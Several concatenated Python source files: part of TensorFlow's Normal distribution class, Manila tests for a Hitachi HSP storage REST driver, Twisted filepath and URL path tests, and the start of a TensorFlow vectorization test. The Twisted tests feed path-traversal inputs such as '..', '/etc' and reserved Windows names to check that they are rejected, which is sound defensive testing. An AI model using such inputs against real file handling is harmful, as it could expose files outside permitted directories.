# Evaluate the pdf of the first distribution on 0, and the second on 1.5,
# returning a length two tensor.
dist.pdf([0, 1.5])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
Arguments are broadcast when possible.
```python
# Define a batch of two scalar valued Normals.
# Both have mean 1, but different standard deviations.
dist = tf.contrib.distributions.Normal(mu=1., sigma=[11, 22.])
# Evaluate the pdf of both distributions on the same point, 3.0,
# returning a length 2 tensor.
dist.pdf(3.0)
```
"""
def __init__(self,
mu,
sigma,
validate_args=False,
allow_nan_stats=True,
name="Normal"):
"""Construct Normal distributions with mean and stddev `mu` and `sigma`.
The parameters `mu` and `sigma` must be shaped in a way that supports
broadcasting (e.g. `mu + sigma` is a valid operation).
Args:
mu: Floating point tensor, the means of the distribution(s).
sigma: Floating point tensor, the stddevs of the distribution(s).
sigma must contain only positive values.
validate_args: `Boolean`, default `False`. Whether to assert that
`sigma > 0`. If `validate_args` is `False`, correct output is not
guaranteed when input is invalid.
allow_nan_stats: `Boolean`, default `True`. If `False`, raise an
exception if a statistic (e.g. mean/mode/etc...) is undefined for any
batch member. If `True`, batch members with valid parameters leading to
undefined statistics will return NaN for this statistic.
name: The name to give Ops created by the initializer.
Raises:
TypeError: if mu and sigma are different dtypes.
"""
parameters = locals()
parameters.pop("self")
with ops.name_scope(name, values=[mu, sigma]) as ns:
with ops.control_dependencies([check_ops.assert_positive(sigma)] if
validate_args else []):
self._mu = array_ops.identity(mu, name="mu")
self._sigma = array_ops.identity(sigma, name="sigma")
contrib_tensor_util.assert_same_float_dtype((self._mu, self._sigma))
super(Normal, self).__init__(
dtype=self._sigma.dtype,
is_continuous=True,
is_reparameterized=True,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._mu, self._sigma],
name=ns)
@staticmethod
def _param_shapes(sample_shape):
return dict(
zip(("mu", "sigma"), ([ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32)] * 2)))
@property
def mu(self):
"""Distribution parameter for the mean."""
return self._mu
@property
def sigma(self):
"""Distribution parameter for standard deviation."""
return self._sigma
def _batch_shape(self):
return array_ops.broadcast_dynamic_shape(
array_ops.shape(self.mu), array_ops.shape(self.sigma))
def _get_batch_shape(self):
return array_ops.broadcast_static_shape(
self._mu.get_shape(), self.sigma.get_shape())
def _event_shape(self):
return constant_op.constant([], dtype=dtypes.int32)
def _get_event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
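# Reparameterized sampling: draw eps ~ N(0, 1) with the broadcast batch
# shape, then shift and scale to mu + sigma * eps. This pathwise form is
# what makes is_reparameterized=True valid for this distribution.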
shape = array_ops.concat(([n], array_ops.shape(self.mean())), 0)
sampled = random_ops.random_normal(
shape=shape, mean=0, stddev=1, dtype=self.mu.dtype, seed=seed)
return sampled * self.sigma + self.mu
def _log_prob(self, x):
return (-0.5 * math.log(2. * math.pi) - math_ops.log(self.sigma)
-0.5 * math_ops.square(self._z(x)))
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _log_cdf(self, x):
return special_math.log_ndtr(self._z(x))
def _cdf(self, x):
return special_math.ndtr(self._z(x))
def _log_survival_function(self, x):
return special_math.log_ndtr(-self._z(x))
def _survival_function(self, x):
return special_math.ndtr(-self._z(x))
def _entropy(self):
# Use broadcasting rules to calculate the full broadcast sigma.
sigma = self.sigma * array_ops.ones_like(self.mu)
return 0.5 * math.log(2. * math.pi * math.e) + math_ops.log(sigma)
def _mean(self):
return self.mu * array_ops.ones_like(self.sigma)
def _variance(self):
return math_ops.square(self.std())
def _std(self):
return self.sigma * array_ops.ones_like(self.mu)
def _mode(self):
return self._mean()
def _z(self, x):
"""Standardize input `x` to a unit normal."""
with ops.name_scope("standardize", values=[x]):
return (x - self.mu) / self.sigma
class NormalWithSoftplusSigma(Normal):
"""Normal with softplus applied to `sigma`."""
def __init__(self,
mu,
sigma,
validate_args=False,
allow_nan_stats=True,
name="NormalWithSoftplusSigma"):
parameters = locals()
parameters.pop("self")
with ops.name_scope(name, values=[sigma]) as ns:
super(NormalWithSoftplusSigma, self).__init__(
mu=mu,
sigma=nn.softplus(sigma, name="softplus_sigma"),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=ns)
self._parameters = parameters
@kullback_leibler.RegisterKL(Normal, Normal)
def _kl_normal_normal(n_a, n_b, name=None):
"""Calculate the batched KL divergence KL(n_a || n_b) with n_a and n_b Normal.
Args:
n_a: instance of a Normal distribution object.
n_b: instance of a Normal distribution object.
name: (optional) Name to use for created operations.
default is "kl_normal_normal".
Returns:
Batchwise KL(n_a || n_b)
"""
with ops.name_scope(name, "kl_normal_normal", [n_a.mu, n_b.mu]):
one = constant_op.constant(1, dtype=n_a.dtype)
two = constant_op.constant(2, dtype=n_a.dtype)
half = constant_op.constant(0.5, dtype=n_a.dtype)
s_a_squared = math_ops.square(n_a.sigma)
s_b_squared = math_ops.square(n_b.sigma)
ratio = s_a_squared / s_b_squared
return (math_ops.square(n_a.mu - n_b.mu) / (two * s_b_squared) +
half * (ratio - one - math_ops.log(ratio)))
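# For reference, the expression above is the standard closed form
#   KL(N(mu_a, s_a^2) || N(mu_b, s_b^2)) = log(s_b / s_a)
#       + (s_a^2 + (mu_a - mu_b)^2) / (2 * s_b^2) - 1/2,
# rewritten in terms of ratio = s_a^2 / s_b^2.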
|
|
# Copyright (c) 2016 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import json
import mock
import requests
import time
from manila import exception
from manila.share.drivers.hitachi.hsp import rest
from manila import test
from manila.tests.share.drivers.hitachi.hsp import fakes
class FakeRequests(object):
status_code = 0
headers = {}
content = ""
def __init__(self, status_code, content='null'):
self.status_code = status_code
self.headers = {'location': 'fake_location'}
self.content = content
def json(self):
return {'messages': [{'message': 'fake_msg'}]}
@ddt.ddt
class HitachiHSPRestTestCase(test.TestCase):
def setUp(self):
super(HitachiHSPRestTestCase, self).setUp()
self.hitachi_hsp_host = '172.24.47.190'
self.hitachi_hsp_username = 'hds_hnas_user'
self.hitachi_hsp_password = 'hds_hnas_password'
self._driver = rest.HSPRestBackend(self.hitachi_hsp_host,
self.hitachi_hsp_username,
self.hitachi_hsp_password)
@ddt.data(202, 500)
def test__send_post(self, code):
self.mock_object(requests, "post", mock.Mock(
return_value=FakeRequests(code)))
if code == 202:
self.mock_object(rest.HSPRestBackend, "_wait_job_status",
mock.Mock())
self._driver._send_post('fake_url')
rest.HSPRestBackend._wait_job_status.assert_called_once_with(
'fake_location', 'COMPLETE')
else:
self.assertRaises(exception.HSPBackendException,
self._driver._send_post, 'fake_url')
@ddt.data({'code': 200, 'content': 'null'},
{'code': 200, 'content': 'fake_content'},
{'code': 500, 'content': 'null'})
@ddt.unpack
def test__send_get(self, code, content):
self.mock_object(requests, "get", mock.Mock(
return_value=FakeRequests(code, content)))
if code == 200:
result = self._driver._send_get('fake_url')
if content == 'null':
self.assertIsNone(result)
else:
self.assertEqual(FakeRequests(code, content).json(), result)
else:
self.assertRaises(exception.HSPBackendException,
self._driver._send_get, 'fake_url')
@ddt.data(202, 500)
def test__send_delete(self, code):
self.mock_object(requests, "delete", mock.Mock(
return_value=FakeRequests(code)))
if code == 202:
self.mock_object(rest.HSPRestBackend, "_wait_job_status",
mock.Mock())
self._driver._send_delete('fake_url')
rest.HSPRestBackend._wait_job_status.assert_called_once_with(
'fake_location', 'COMPLETE')
else:
self.assertRaises(exception.HSPBackendException,
self._driver._send_delete, 'fake_url')
def test_add_file_system(self):
url = "https://172.24.47.190/hspapi/file-systems/"
payload = {
'quota': fakes.file_system['properties']['quota'],
'auto-access': False,
'enabled': True,
'description': '',
'record-access-time': True,
'tags': '',
'space-hwm': 90,
'space-lwm': 70,
'name': fakes.file_system['properties']['name'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.add_file_system(fakes.file_system['properties']['name'],
fakes.file_system['properties']['quota'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_get_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/list?name=%s" %
fakes.file_system['properties']['name'])
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value={'list': [fakes.file_system]}))
result = self._driver.get_file_system(
fakes.file_system['properties']['name'])
self.assertEqual(fakes.file_system, result)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_get_file_system_exception(self):
url = ("https://172.24.47.190/hspapi/file-systems/list?name=%s" %
fakes.file_system['properties']['name'])
self.mock_object(rest.HSPRestBackend, "_send_get",
mock.Mock(return_value=None))
self.assertRaises(exception.HSPItemNotFoundException,
self._driver.get_file_system,
fakes.file_system['properties']['name'])
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_delete_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/%s" %
fakes.file_system['id'])
self.mock_object(rest.HSPRestBackend, "_send_delete", mock.Mock())
self._driver.delete_file_system(fakes.file_system['id'])
rest.HSPRestBackend._send_delete.assert_called_once_with(url)
def test_resize_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/%s" %
fakes.file_system['id'])
new_size = 53687091200
payload = {'quota': new_size}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.resize_file_system(fakes.file_system['id'], new_size)
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_rename_file_system(self):
url = ("https://172.24.47.190/hspapi/file-systems/%s" %
fakes.file_system['id'])
new_name = "fs_rename"
payload = {'name': new_name}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.rename_file_system(fakes.file_system['id'], new_name)
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_add_share(self):
url = "https://172.24.47.190/hspapi/shares/"
payload = {
'description': '',
'type': 'NFS',
'enabled': True,
'tags': '',
'name': fakes.share['name'],
'file-system-id': fakes.share['properties']['file-system-id'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.add_share(fakes.share['name'],
fakes.share['properties']['file-system-id'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
@ddt.data({'fs_id': None,
'name': fakes.share['name'],
'url': 'https://172.24.47.190/hspapi/shares/list?'
'name=aa4a7710-f326-41fb-ad18-b4ad587fc87a'},
{'fs_id': fakes.share['properties']['file-system-id'],
'name': None,
'url': 'https://172.24.47.190/hspapi/shares/list?'
'file-system-id=33689245-1806-45d0-8507-0700b5f89750'})
@ddt.unpack
def test_get_share(self, fs_id, name, url):
self.mock_object(rest.HSPRestBackend, "_send_get",
mock.Mock(return_value={'list': [fakes.share]}))
result = self._driver.get_share(fs_id, name)
self.assertEqual(fakes.share, result)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_get_share_exception(self):
url = ("https://172.24.47.190/hspapi/shares/list?"
"name=aa4a7710-f326-41fb-ad18-b4ad587fc87a")
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=None))
self.assertRaises(exception.HSPItemNotFoundException,
self._driver.get_share, None, fakes.share['name'])
rest.HSPRestBackend._send_get.assert_called_once_with(url)
def test_delete_share(self):
url = "https://172.24.47.190/hspapi/shares/%s" % fakes.share['id']
self.mock_object(rest.HSPRestBackend, "_send_delete")
self._driver.delete_share(fakes.share['id'])
rest.HSPRestBackend._send_delete.assert_called_once_with(url)
def test_add_access_rule(self):
url = "https://172.24.47.190/hspapi/shares/%s/" % fakes.share['id']
payload = {
"action": "add-access-rule",
"name": fakes.share['id'] + fakes.access_rule['access_to'],
"host-specification": fakes.access_rule['access_to'],
"read-write": fakes.access_rule['access_level'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.add_access_rule(fakes.share['id'],
fakes.access_rule['access_to'],
fakes.access_rule['access_level'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
def test_delete_access_rule(self):
url = "https://172.24.47.190/hspapi/shares/%s/" % fakes.share['id']
payload = {
"action": "delete-access-rule",
"name": fakes.hsp_rules[0]['name'],
}
self.mock_object(rest.HSPRestBackend, "_send_post", mock.Mock())
self._driver.delete_access_rule(fakes.share['id'],
fakes.hsp_rules[0]['name'])
rest.HSPRestBackend._send_post.assert_called_once_with(
url, payload=json.dumps(payload))
@ddt.data({'value': {'list': fakes.hsp_rules}, 'res': fakes.hsp_rules},
{'value': None, 'res': []})
@ddt.unpack
def test_get_access_rules(self, value, res):
url = ("https://172.24.47.190/hspapi/shares/%s/access-rules" %
fakes.share['id'])
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=value))
result = self._driver.get_access_rules(fakes.share['id'])
self.assertEqual(res, result)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
@ddt.data({'list': [fakes.hsp_cluster]}, None)
def test_get_clusters(self, value):
url = "https://172.24.47.190/hspapi/clusters/list"
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=value))
if value:
result = self._driver.get_cluster()
self.assertEqual(fakes.hsp_cluster, result)
else:
self.assertRaises(exception.HSPBackendException,
self._driver.get_cluster)
rest.HSPRestBackend._send_get.assert_called_once_with(url)
@ddt.data('COMPLETE', 'ERROR', 'RUNNING')
def test__wait_job_status(self, stat):
url = "fake_job_url"
json = {
'id': 'fake_id',
'properties': {
'completion-details': 'Duplicate NFS access rule exists',
'completion-status': stat,
},
'messages': [{
'id': 'fake_id',
'message': 'fake_msg',
}]
}
self.mock_object(rest.HSPRestBackend, "_send_get", mock.Mock(
return_value=json))
self.mock_object(time, "sleep")
if stat == 'COMPLETE':
self._driver._wait_job_status(url, 'COMPLETE')
rest.HSPRestBackend._send_get.assert_called_once_with(url)
elif stat == 'ERROR':
self.assertRaises(exception.HSPBackendException,
self._driver._wait_job_status, url, 'COMPLETE')
rest.HSPRestBackend._send_get.assert_called_once_with(url)
else:
self.assertRaises(exception.HSPTimeoutException,
self._driver._wait_job_status, url, 'COMPLETE')
rest.HSPRestBackend._send_get.assert_has_calls([
mock.call(url), mock.call(url), mock.call(url), mock.call(url),
mock.call(url),
])
|
|
import os, time, pickle, errno, zipfile
from twisted.python import filepath
from twisted.python.runtime import platform
from twisted.trial import unittest
class AbstractFilePathTestCase(unittest.TestCase):
f1content = "file 1"
f2content = "file 2"
def _mkpath(self, *p):
x = os.path.abspath(os.path.join(self.cmn, *p))
self.all.append(x)
return x
def subdir(self, *dirname):
os.mkdir(self._mkpath(*dirname))
def subfile(self, *dirname):
return open(self._mkpath(*dirname), "wb")
def setUp(self):
self.now = time.time()
cmn = self.cmn = os.path.abspath(self.mktemp())
self.all = [cmn]
os.mkdir(cmn)
self.subdir("sub1")
f = self.subfile("file1")
f.write(self.f1content)
f = self.subfile("sub1", "file2")
f.write(self.f2content)
self.subdir('sub3')
f = self.subfile("sub3", "file3.ext1")
f = self.subfile("sub3", "file3.ext2")
f = self.subfile("sub3", "file3.ext3")
self.all.sort()
self.path = filepath.FilePath(cmn)
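# Directory fixture created above, relative to self.cmn:
#   file1                   -> f1content
#   sub1/file2              -> f2content
#   sub3/file3.ext1, file3.ext2, file3.ext3 (created empty)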
def test_segmentsFromPositive(self):
"""
Verify that the segments between two paths are correctly identified.
"""
self.assertEquals(
self.path.child("a").child("b").child("c").segmentsFrom(self.path),
["a", "b", "c"])
def test_segmentsFromNegative(self):
"""Verify that segmentsFrom notices when the ancestor isn't an ancestor.
"""
self.assertRaises(
ValueError,
self.path.child("a").child("b").child("c").segmentsFrom,
self.path.child("d").child("c").child("e"))
def test_walk(self):
"""Verify that walking the path gives the same result as the known file
hierarchy.
"""
x = [foo.path for foo in self.path.walk()]
x.sort()
self.assertEquals(x, self.all)
def test_validSubdir(self):
"""Verify that a valid subdirectory will show up as a directory, but not as a
file, not as a symlink, and be listable.
"""
sub1 = self.path.child('sub1')
self.failUnless(sub1.exists(),
"This directory does exist.")
self.failUnless(sub1.isdir(),
"It's a directory.")
self.failUnless(not sub1.isfile(),
"It's a directory.")
self.failUnless(not sub1.islink(),
"It's a directory.")
self.failUnlessEqual(sub1.listdir(),
['file2'])
def test_invalidSubdir(self):
"""
Verify that a subdirectory that doesn't exist is reported as such.
"""
sub2 = self.path.child('sub2')
self.failIf(sub2.exists(),
"This directory does not exist.")
def test_validFiles(self):
"""
Make sure that we can read existent non-empty files.
"""
f1 = self.path.child('file1')
self.failUnlessEqual(f1.open().read(), self.f1content)
f2 = self.path.child('sub1').child('file2')
self.failUnlessEqual(f2.open().read(), self.f2content)
def zipit(dirname, zfname):
"""
Create a zipfile at zfname containing the contents of dirname.
"""
zf = zipfile.ZipFile(zfname, "w")
basedir = os.path.basename(dirname)
for root, dirs, files in os.walk(dirname):
for fname in files:
fspath = os.path.join(root, fname)
arcpath = os.path.join(root, fname)[len(dirname)+1:]
# print fspath, '=>', arcpath
zf.write(fspath, arcpath)
zf.close()
from twisted.python.zippath import ZipArchive
class ZipFilePathTestCase(AbstractFilePathTestCase):
def setUp(self):
AbstractFilePathTestCase.setUp(self)
zipit(self.cmn, self.cmn+'.zip')
self.path = ZipArchive(self.cmn+'.zip')
self.all = [x.replace(self.cmn, self.cmn+'.zip') for x in self.all]
class FilePathTestCase(AbstractFilePathTestCase):
def test_getAndSet(self):
content = 'newcontent'
self.path.child('new').setContent(content)
newcontent = self.path.child('new').getContent()
self.failUnlessEqual(content, newcontent)
content = 'content'
self.path.child('new').setContent(content, '.tmp')
newcontent = self.path.child('new').getContent()
self.failUnlessEqual(content, newcontent)
def testSymbolicLink(self):
s4 = self.path.child("sub4")
s3 = self.path.child("sub3")
os.symlink(s3.path, s4.path)
self.failUnless(s4.islink())
self.failIf(s3.islink())
self.failUnless(s4.isdir())
self.failUnless(s3.isdir())
if not hasattr(os, "symlink"):
testSymbolicLink.skip = "Your platform does not support symbolic links."
def testMultiExt(self):
f3 = self.path.child('sub3').child('file3')
exts = '.foo','.bar', 'ext1','ext2','ext3'
self.failIf(f3.siblingExtensionSearch(*exts))
f3e = f3.siblingExtension(".foo")
f3e.touch()
self.failIf(not f3.siblingExtensionSearch(*exts).exists())
self.failIf(not f3.siblingExtensionSearch('*').exists())
f3e.remove()
self.failIf(f3.siblingExtensionSearch(*exts))
def testPreauthChild(self):
fp = filepath.FilePath('.')
fp.preauthChild('foo/bar')
self.assertRaises(filepath.InsecurePath, fp.child, '/foo')
def testStatCache(self):
p = self.path.child('stattest')
p.touch()
self.failUnlessEqual(p.getsize(), 0)
self.failUnlessEqual(abs(p.getmtime() - time.time()) // 20, 0)
self.failUnlessEqual(abs(p.getctime() - time.time()) // 20, 0)
self.failUnlessEqual(abs(p.getatime() - time.time()) // 20, 0)
self.failUnlessEqual(p.exists(), True)
self.failUnlessEqual(p.exists(), True)
# OOB removal: FilePath.remove() will automatically restat
os.remove(p.path)
# test caching
self.failUnlessEqual(p.exists(), True)
p.restat(reraise=False)
self.failUnlessEqual(p.exists(), False)
self.failUnlessEqual(p.islink(), False)
self.failUnlessEqual(p.isdir(), False)
self.failUnlessEqual(p.isfile(), False)
def testPersist(self):
newpath = pickle.loads(pickle.dumps(self.path))
self.failUnlessEqual(self.path.__class__, newpath.__class__)
self.failUnlessEqual(self.path.path, newpath.path)
def testInsecureUNIX(self):
self.assertRaises(filepath.InsecurePath, self.path.child, "..")
self.assertRaises(filepath.InsecurePath, self.path.child, "/etc")
self.assertRaises(filepath.InsecurePath, self.path.child, "../..")
def testInsecureWin32(self):
self.assertRaises(filepath.InsecurePath, self.path.child, r"..\..")
self.assertRaises(filepath.InsecurePath, self.path.child, r"C:randomfile")
if platform.getType() != 'win32':
testInsecureWin32.skip = "Consider yourself lucky."
def testInsecureWin32Whacky(self):
"""Windows has 'special' filenames like NUL and CON and COM1 and LPR
and PRN and ... god knows what else. They can be located anywhere in
the filesystem. For obvious reasons, we do not wish to normally permit
access to these.
"""
self.assertRaises(filepath.InsecurePath, self.path.child, "CON")
self.assertRaises(filepath.InsecurePath, self.path.child, "C:CON")
self.assertRaises(filepath.InsecurePath, self.path.child, r"C:\CON")
if platform.getType() != 'win32':
testInsecureWin32Whacky.skip = "Consider yourself lucky."
def testComparison(self):
self.assertEquals(filepath.FilePath('a'),
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('z') >
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('z') >=
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('a') >=
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('a') <=
filepath.FilePath('a'))
self.failUnless(filepath.FilePath('a') <
filepath.FilePath('z'))
self.failUnless(filepath.FilePath('a') <=
filepath.FilePath('z'))
self.failUnless(filepath.FilePath('a') !=
filepath.FilePath('z'))
self.failUnless(filepath.FilePath('z') !=
filepath.FilePath('a'))
self.failIf(filepath.FilePath('z') !=
filepath.FilePath('z'))
def testSibling(self):
p = self.path.child('sibling_start')
ts = p.sibling('sibling_test')
self.assertEquals(ts.dirname(), p.dirname())
self.assertEquals(ts.basename(), 'sibling_test')
ts.createDirectory()
self.assertIn(ts, self.path.children())
def testTemporarySibling(self):
ts = self.path.temporarySibling()
self.assertEquals(ts.dirname(), self.path.dirname())
self.assertNotIn(ts.basename(), self.path.listdir())
ts.createDirectory()
self.assertIn(ts, self.path.parent().children())
def testRemove(self):
self.path.remove()
self.failIf(self.path.exists())
def testCopyTo(self):
self.assertRaises((OSError, IOError), self.path.copyTo, self.path.child('file1'))
oldPaths = list(self.path.walk()) # Record initial state
fp = filepath.FilePath(self.mktemp())
self.path.copyTo(fp)
self.path.remove()
fp.copyTo(self.path)
newPaths = list(self.path.walk()) # Record double-copy state
newPaths.sort()
oldPaths.sort()
self.assertEquals(newPaths, oldPaths)
def testMoveTo(self):
self.assertRaises((OSError, IOError), self.path.moveTo, self.path.child('file1'))
oldPaths = list(self.path.walk()) # Record initial state
fp = filepath.FilePath(self.mktemp())
self.path.moveTo(fp)
fp.moveTo(self.path)
newPaths = list(self.path.walk()) # Record double-move state
newPaths.sort()
oldPaths.sort()
self.assertEquals(newPaths, oldPaths)
def testCrossMountMoveTo(self):
"""
"""
# Bit of a whitebox test - force os.rename, which moveTo tries
# before falling back to a slower method, to fail, forcing moveTo to
# use the slower behavior.
invokedWith = []
def faultyRename(src, dest):
invokedWith.append((src, dest))
if len(invokedWith) == 2:
raise OSError(errno.EXDEV, 'Test-induced failure simulating cross-device rename failure')
return originalRename(src, dest)
originalRename = os.rename
os.rename = faultyRename
try:
self.testMoveTo()
# A bit of a sanity check for this whitebox test - if our rename
# was never invoked, the test has probably fallen into
# disrepair!
self.failUnless(len(invokedWith) >= 2)
finally:
os.rename = originalRename
def testOpen(self):
# Opening a file for reading when it does not already exist is an error
nonexistent = self.path.child('nonexistent')
e = self.assertRaises(IOError, nonexistent.open)
self.assertEquals(e.errno, errno.ENOENT)
# Opening a file for writing when it does not exist is okay
writer = self.path.child('writer')
f = writer.open('w')
f.write('abc\ndef')
f.close()
# Make sure those bytes ended up there - and test opening a file for
# reading when it does exist at the same time
f = writer.open()
self.assertEquals(f.read(), 'abc\ndef')
f.close()
# Re-opening that file in write mode should erase whatever was there.
f = writer.open('w')
f.close()
f = writer.open()
self.assertEquals(f.read(), '')
f.close()
# Put some bytes in a file so we can test that appending does not
# destroy them.
appender = self.path.child('appender')
f = appender.open('w')
f.write('abc')
f.close()
f = appender.open('a')
f.write('def')
f.close()
f = appender.open('r')
self.assertEquals(f.read(), 'abcdef')
f.close()
# read/write should let us do both without erasing those bytes
f = appender.open('r+')
self.assertEquals(f.read(), 'abcdef')
# ANSI C *requires* an fseek or an fgetpos between an fread and an
# fwrite or an fwrite and a fread. We can't reliably get Python to
# invoke fgetpos, so we seek to a 0 byte offset from the current
# position instead. Also, Python sucks for making this seek
# relative to 1 instead of a symbolic constant representing the
# current file position.
f.seek(0, 1)
# Put in some new bytes for us to test for later.
f.write('ghi')
f.close()
# Make sure those new bytes really showed up
f = appender.open('r')
self.assertEquals(f.read(), 'abcdefghi')
f.close()
# write/read should let us do both, but erase anything that's there
# already.
f = appender.open('w+')
self.assertEquals(f.read(), '')
f.seek(0, 1) # Don't forget this!
f.write('123')
f.close()
# super append mode should let us read and write and also position the
# cursor at the end of the file, without erasing everything.
f = appender.open('a+')
# The order of these lines may seem surprising, but it is necessary.
# The cursor is not at the end of the file until after the first write.
f.write('456')
f.seek(0, 1) # Asinine.
self.assertEquals(f.read(), '')
f.seek(0, 0)
self.assertEquals(f.read(), '123456')
f.close()
# Opening a file exclusively must fail if that file exists already.
nonexistent.requireCreate(True)
nonexistent.open('w').close()
existent = nonexistent
del nonexistent
self.assertRaises((OSError, IOError), existent.open)
from twisted.python import urlpath
class URLPathTestCase(unittest.TestCase):
def setUp(self):
self.path = urlpath.URLPath.fromString("http://example.com/foo/bar?yes=no&no=yes#footer")
def testStringConversion(self):
self.assertEquals(str(self.path), "http://example.com/foo/bar?yes=no&no=yes#footer")
def testChildString(self):
self.assertEquals(str(self.path.child('hello')), "http://example.com/foo/bar/hello")
self.assertEquals(str(self.path.child('hello').child('')), "http://example.com/foo/bar/hello/")
def testSiblingString(self):
self.assertEquals(str(self.path.sibling('baz')), 'http://example.com/foo/baz')
# The sibling of http://example.com/foo/bar/
# is http://example.com/foo/bar/baz
# because really we are constructing a sibling of
# http://example.com/foo/bar/index.html
self.assertEquals(str(self.path.child('').sibling('baz')), 'http://example.com/foo/bar/baz')
def testParentString(self):
# parent should be equivalent to '..'
# 'foo' is the current directory, '/' is the parent directory
self.assertEquals(str(self.path.parent()), 'http://example.com/')
self.assertEquals(str(self.path.child('').parent()), 'http://example.com/foo/')
self.assertEquals(str(self.path.child('baz').parent()), 'http://example.com/foo/')
self.assertEquals(str(self.path.parent().parent().parent().parent().parent()), 'http://example.com/')
def testHereString(self):
# here should be equivalent to '.'
self.assertEquals(str(self.path.here()), 'http://example.com/foo/')
self.assertEquals(str(self.path.child('').here()), 'http://example.com/foo/bar/')
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for vectorization of math kernels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.eager import backprop
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops as framework_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops.parallel_for.test_util import PForTestCase
from tensorflow.python.platform import test
@test_util.run_all_in_graph_and_eager_modes
class MathTest(PForTestCase, parameterized.TestCase):
def _test_unary_cwise_ops(self, ops, is_complex):
for op in ops:
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 5])
g.watch(x)
if is_complex:
y = random_ops.random_uniform([3, 5])
g.watch(y)
x = math_ops.complex(x, y)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
with g:
y = op(x)
x_i = array_ops.gather(x, i)
y_i = op(x_i)
outputs = [y_i]
# Build cross product of loop variant/invariant outputs and gradients.
for out in (y, y_i):
if out.dtype == dtypes.float32:
for output_gradients in (None, out * math_ops.cast(i, out.dtype)):
grad = g.gradient(out, x_i, output_gradients=output_gradients)
if grad is not None:
outputs.append(grad)
return outputs
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_unary_cwise_complex_ops(self):
complex_ops = [
math_ops.angle,
math_ops.imag,
math_ops.complex_abs,
math_ops.real,
math_ops.conj,
]
self._test_unary_cwise_ops(complex_ops, True)
def test_unary_cwise_real_ops_1(self):
if test.is_built_with_rocm():
# TODO(rocm):
# This fails on ROCm...see JIRA ticket 236756
self.skipTest("Fails on ROCM")
real_ops = [
lambda x: math_ops.acosh(1 + math_ops.square(x)),
math_ops.abs,
math_ops.acos,
math_ops.asin,
math_ops.asinh,
math_ops.atan,
math_ops.atanh,
math_ops.cos,
math_ops.cosh,
math_ops.digamma,
math_ops.erf,
math_ops.erfc,
math_ops.erfinv,
math_ops.exp,
math_ops.expm1,
math_ops.inv,
math_ops.is_finite,
math_ops.is_inf,
math_ops.lgamma,
math_ops.log,
math_ops.log1p,
math_ops.ndtri,
special_math_ops.bessel_i0e,
special_math_ops.bessel_i1e,
]
self._test_unary_cwise_ops(real_ops, False)
def test_unary_cwise_real_ops_2(self):
real_ops = [
math_ops.neg,
math_ops.negative,
math_ops.reciprocal,
math_ops.rint,
math_ops.round,
math_ops.rsqrt,
math_ops.sigmoid,
math_ops.sign,
math_ops.sin,
math_ops.sinh,
math_ops.sqrt,
math_ops.square,
math_ops.tan,
math_ops.tanh,
nn.elu,
nn.relu,
nn.relu6,
lambda t: nn.leaky_relu(t, alpha=0.1),
nn.selu,
